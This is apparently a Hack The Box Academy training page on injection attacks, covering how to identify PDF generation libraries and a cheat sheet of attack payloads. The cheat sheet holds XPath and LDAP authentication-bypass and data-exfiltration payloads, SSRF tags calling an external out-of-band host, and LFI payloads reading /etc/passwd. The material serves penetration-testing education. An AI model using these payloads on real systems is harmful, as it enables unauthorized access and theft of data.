Injection Attacks

Introduction to PDF Generation Vulnerabilities

Many web applications provide a PDF generation functionality, such as for invoices or reports. Most of these PDFs contain dynamic user input. In the next couple of sections, we will discuss misconfigurations and bugs that can result in security vulnerabilities due to HTML injection in the input for PDF generation libraries.

PDF Generation

The Portable Document Format (PDF) is a file format implemented to provide platform-independent document presentation. Since PDF files are widely used for many applications, PDF generation is a commonly implemented functionality in web applications. To enable PDF generation, web applications rely on PDF generation libraries or plugins.

However, misconfigurations, a lack of proper configuration, and outdated versions of these external libraries open the door for vulnerabilities, mainly caused by users feeding malicious input that does not get properly sanitized.

As an example, here are a few PDF generation libraries commonly used in web applications:

Since web applications need to be able to design the layout of the resulting PDF files, these libraries accept HTML code as input and use it to generate the final PDF file. This allows the web application to control the design of the PDF file via CSS in the HTML code. The libraries work by parsing the HTML code, rendering it, and creating a PDF.

Example: wkhtmltopdf

As an example of how PDF generators work, we will look at wkhtmltopdf, for which you can download a precompiled binary here. Note how there is a bold security notice at the top of the page that hints at the vulnerabilities we are about to discuss in the upcoming sections:

Do not use wkhtmltopdf with any untrusted HTML – be sure to sanitize any user-supplied HTML/JS, otherwise it can lead to complete takeover of the server it is running on!

After downloading wkhtmltopdf, we can install it using the following command on Debian-based Linux distributions:

[!bash!]$ sudo dpkg -i wkhtmltox_0.12.6.1-2.bullseye_amd64.deb

Running wkhtmltopdf with the -h option will display the tool's help information:

[!bash!]$ wkhtmltopdf -h

Name:
  wkhtmltopdf 0.12.6.1 (with patched qt)

Synopsis:
  wkhtmltopdf [GLOBAL OPTION]... [OBJECT]... <output file>

<SNIP>

When providing a URL to wkhtmltopdf, it will automatically fetch the website and convert it to a PDF:

[!bash!]$ wkhtmltopdf https://academy.hackthebox.com/ htb.pdf

Loading pages (1/6)
Counting pages (2/6)                                               
Resolving links (4/6)                                                       
Loading headers and footers (5/6)                                           
Printing pages (6/6)
Done

Looking at the resulting PDF, we can recognize the HackTheBox Academy website, although it has been resized to fit on PDF pages:

Furthermore, we can provide the tool with a local HTML file to simulate more closely what a PDF generation library in a web application does. As an example, let us use the following HTML file:

<!DOCTYPE html>
<html>
    <head>
    </head>
    <body>
        <h1>Hello World!</h1>
        <p>This is some text.</p>
    </body>
</html>

We can now run wkhtmltopdf on the HTML file to produce a PDF equivalent:

[!bash!]$ wkhtmltopdf ./index.html test.pdf

Loading pages (1/6)
Counting pages (2/6)                                               
Resolving links (4/6)                                                       
Loading headers and footers (5/6)                                           
Printing pages (6/6)
Done

To simulate a real-world example of how a web application might use PDF generation, let us consider an online shop that provides PDF invoices to customers after completing an order. This can easily be achieved using a PDF generation library. For example, let us download an open-source invoice HTML template from here. We can then run wkhtmltopdf to generate a PDF invoice from the HTML code with its custom CSS. The generated PDF looks like this:

Analysis of PDF Files

We need to determine which PDF generation library a web application utilizes to target specific vulnerabilities and misconfigurations. Fortunately, most of these libraries add information in the metadata of the generated PDF that helps us identify the library. Thus, we simply need to get our hands on a PDF generated by the web application for analysis. To display the metadata of a PDF file, we can use the tool exiftool, which can be installed like so:

[!bash!]$ apt install libimage-exiftool-perl

Running exiftool with the -h option will display the tool's help information:

[!bash!]$ exiftool -h

Syntax:  exiftool [OPTIONS] FILE

Consult the exiftool documentation for a full list of options

When we run exiftool on a generated PDF file, the creator and producer metadata fields give us more information about the PDF's generation library and its specific version, in this case wkhtmltopdf 0.12.6.1 and Qt 4.8.7, respectively:

[!bash!]$ exiftool invoice.pdf

ExifTool Version Number         : 12.16
File Name                       : invoice.pdf
Directory                       : .
File Size                       : 18 KiB
File Modification Date/Time     : 2023:03:13 20:42:24+01:00
File Access Date/Time           : 2023:03:13 20:42:24+01:00
File Inode Change Date/Time     : 2023:03:13 20:42:24+01:00
File Permissions                : rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Title                           : A simple, clean, and responsive HTML invoice template
Creator                         : wkhtmltopdf 0.12.6.1
Producer                        : Qt 4.8.7
Create Date                     : 2023:03:13 20:42:24+01:00
Page Count                      : 1

This allows us to search for vulnerabilities for a specific version of the PDF generation library. Alternatively, we can also use the tool pdfinfo to achieve the same task:

[!bash!]$ pdfinfo invoice.pdf 

Title:          A simple, clean, and responsive HTML invoice template
Creator:        wkhtmltopdf 0.12.6.1
Producer:       Qt 4.8.7
CreationDate:   Mon Mar 13 20:42:24 2023 CET
Tagged:         no
UserProperties: no
Suspects:       no
Form:           none
JavaScript:     no
Pages:          1
Encrypted:      no
Page size:      595 x 842 pts (A4)
Page rot:       0
File size:      18488 bytes
Optimized:      no
PDF version:    1.4

Here is another example output from exiftool on a PDF generated by a different library (dompdf):

[!bash!]$ exiftool file.pdf

ExifTool Version Number         : 12.16
File Name                       : file.pdf
Directory                       : .
File Size                       : 1071 bytes
File Modification Date/Time     : 2023:03:13 20:45:10+01:00
File Access Date/Time           : 2023:03:13 20:45:10+01:00
File Inode Change Date/Time     : 2023:03:13 20:45:14+01:00
File Permissions                : rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.7
Linearized                      : No
Page Count                      : 1
Producer                        : dompdf 2.0.3 + CPDF
Create Date                     : 2023:03:13 12:45:05-07:00
Modify Date                     : 2023:03:13 12:45:05-07:00

Previous Next

Introduction to Injection Attacks

Skills Assessment

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

XPath Injection

XPath Syntax

Nodes:

Query	Explanation
`module`	Select all `module` child nodes of the context node
`/`	Select the document root node
`//`	Select descendant nodes of the context node
`.`	Select the context node
`..`	Select the parent node of the context node
`@difficulty`	Select the `difficulty` attribute node of the context node
`text()`	Select all text node child nodes of the context node

Predicates:

Query	Explanation
`/academy_modules/module[1]`	Select the first `module` child node of the `academy_modules` node
`/academy_modules/module[position()=1]`	Equivalent to the above query
`/academy_modules/module[last()]`	Select the last `module` child node of the `academy_modules` node
`/academy_modules/module[position()<3]`	Select the first two `module` child nodes of the `academy_modules` node
`//module[tier=2]/title/text()`	Select the `title` of all modules where the `tier` element node equals `2`
`//module/author[@co-author]/../title`	Select the `title` of all modules where the `author` element node has a `co-author` attribute node
`//module/tier[@difficulty="medium"]/..`	Select all modules where the `tier` element node has a `difficulty` attribute node set to `medium`

Predicate Operands:

Operand	Explanation
`+`	Addition
`-`	Subtraction
`*`	Multiplication
`div`	Division
`=`	Equal
`!=`	Not Equal
`<`	Less than
`<=`	Less than or Equal
`>`	Greater than
`>=`	Greater than or Equal
`or`	Logical Or
`and`	Logical And
`mod`	Modulus

Wildcards:

Query	Explanation
`node()`	Matches any node
`*`	Matches any `element` node
`@*`	Matches any `attribute` node

Union:

Query	Explanation
`//module[tier=2]/title/text() \| //module[tier=3]/title/text()`	Select the title of all modules in tiers `2` and `3`

Authentication Bypass

Description	Username	Query
Regular Authentication	`htb-stdnt`	`/users/user[username/text()='htb-stdnt' and password/text()='295362c2618a05ba3899904a6a3f5bc0']`
Bypass Authentication with known username	`admin' or '1'='1`	`/users/user[username/text()='admin' or '1'='1' and password/text()='21232f297a57a5a743894a0e4a801fc3']`
Bypass Authentication by position	`' or position()=1 or '`	`/users/user[username/text()='' or position()=1 or '' and password/text()='21232f297a57a5a743894a0e4a801fc3']`
Bypass Authentication by substring	`' or contains(.,'admin') or '`	`/users/user[username/text()='' or contains(.,'admin') or '' and password/text()='21232f297a57a5a743894a0e4a801fc3']`

Data Exfiltration

Unrestricted:

Leak entire XML document via union injection: | //text()

Restricted:

Determine schema depth via chain of wildcards /*[1]
iterate through XML schema by increasing the indices to exfiltrate the entire document step-by-step

Blind Data Exfiltration

Description	Payload	Query
Exfiltrating Node Name's Length	`invalid' or string-length(name(/*[1]))=1 and '1'='1`	`/users/user[username='invalid' or string-length(name(/*[1]))=1 and '1'='1']`
Exfiltrating Node Name	`invalid' or substring(name(/*[1]),1,1)='a' and '1'='1`	`/users/user[username='invalid' or substring(name(/*[1]),1,1)='a' and '1'='1']`
Exfiltrating Number of Child Nodes	`invalid' or count(/[1]/)=1 and '1'='1`	`/users/user[username='invalid' or count(/[1]/)=1 and '1'='1']`
Exfiltrating Value Length	`invalid' or string-length(/users/user[1]/username)=1 and '1'='1`	`/users/user[username='invalid' or string-length(/users/user[1]/username)=1 and '1'='1']`
Exfiltrating Value	`invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1`	`/users/user[username='invalid' or substring(/users/user[1]/username,1,1)='a' and '1'='1']`

Time-based

Force the web application to iterate over the entire XML document exponentially:

count((//.)[count((//.))])

Determine whether the first letter of the "username" is "a" based on the time it takes: if it is, the query will utilize a significant processing time, otherwise, it won't.

invalid' or substring(/users/user[1]/username,1,1)='a' and count((//.)[count((//.))]) and '1'='1

LDAP Injection

LDAP Search Filter Syntax

Name	Operand	Example	Example Description
Equality	`=`	`(name=Kaylie)`	Matches all entries that contain a `name` attribute with the value `Kaylie`
Greater-Or-Equal	`>=`	`(uid>=10)`	Matches all entries that contain a `uid` attribute with a value greater-or-equal to `10`
Less-Or-Equal	`<=`	`(uid<=10)`	Matches all entries that contain a `uid` attribute with a value less-or-equal to `10`
Approximate Match	`~=`	`(name~=Kaylie)`	Matches all entries that contain a `name` attribute with approximately the value `Kaylie`
And	`(&()())`	`(&(name=Kaylie)(title=Manager))`	Matches all entries that contain a `name` attribute with the value `Kaylie` and a `title` attribute with the value `Manager`
Or	`(\|()())`	`(\|(name=Kaylie)(title=Manager))`	Matches all entries that contain a `name` attribute with the value `Kaylie` or a `title` attribute with the value `Manager`
Not	`(!())`	`(!(name=Kaylie))`	Matches all entries that contain a `name` attribute with a value different from `Kaylie`
True	`(&)`	`(&)`	Universal True
False	`(\|)`	`(\|)`	Universal False
Wildcard	`*`	`(name=a)`	Matches all entries that contain a name attribute that contains an `a`

Authentication Bypass

Description	Username	Password	Search Filter
Regular Authentication	`admin`	`admin`	`(&(uid=admin)(userPassword=admin))`
Wildcard Bypass	`*`	`*`	`(&(uid=)(userPassword=))`
Wildcard Bypass targeting specific user	`admin*`	`*`	`(&(uid=admin)(userPassword=))`
Universal True Bypass	`admin)(\|(&`	`invalid)`	`(&(uid=admin)(\|(&)(userPassword=invalid)))`

Data Exfiltration

Brute-Force data character-by-character:

Username	Password	Query
`htb-stdnt`	`*`	`(&(uid=htb-stdnt)(userPassword=*))`
`htb-stdnt`	`p*`	`(&(uid=htb-stdnt)(userPassword=p*))`
`htb-stdnt`	`p@*`	`(&(uid=htb-stdnt)(userPassword=p@*))`
`htb-stdnt`	`p@s*`	`(&(uid=htb-stdnt)(userPassword=p@s*))`
`htb-stdnt`	`p@ss*`	`(&(uid=htb-stdnt)(userPassword=p@ss*))`
`htb-stdnt`	`p@ssw*`	`(&(uid=htb-stdnt)(userPassword=p@ssw*))`
`htb-stdnt`	`p@ssw0*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0*))`
`htb-stdnt`	`p@ssw0r*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0r*))`
`htb-stdnt`	`p@ssw0rd*`	`(&(uid=htb-stdnt)(userPassword=p@ssw0rd*))`
`htb-stdnt`	`p@ssw0rd`	`(&(uid=htb-stdnt)(userPassword=p@ssw0rd))`

PDF Generation Vulnerabilities

Determining the PDF Generation Library

$ exiftool invoice.pdf 
<SNIP>
Creator                         : wkhtmltopdf 0.12.6.1
Producer                        : Qt 4.8.7
<SNIP>

Server-Side Request Forgery (SSRF) Payloads

<img src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest1"/>
<link rel="stylesheet" href="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest2">
<iframe src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest3"></iframe>

Local File Inclusion (LFI) Payloads

<script>
	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(this.responseText)
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

<iframe src="file:///etc/passwd" width="800" height="500"></iframe>
<object data="file:///etc/passwd" width="800" height="500">
<portal src="file:///etc/passwd" width="800" height="500">

<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="LFI" />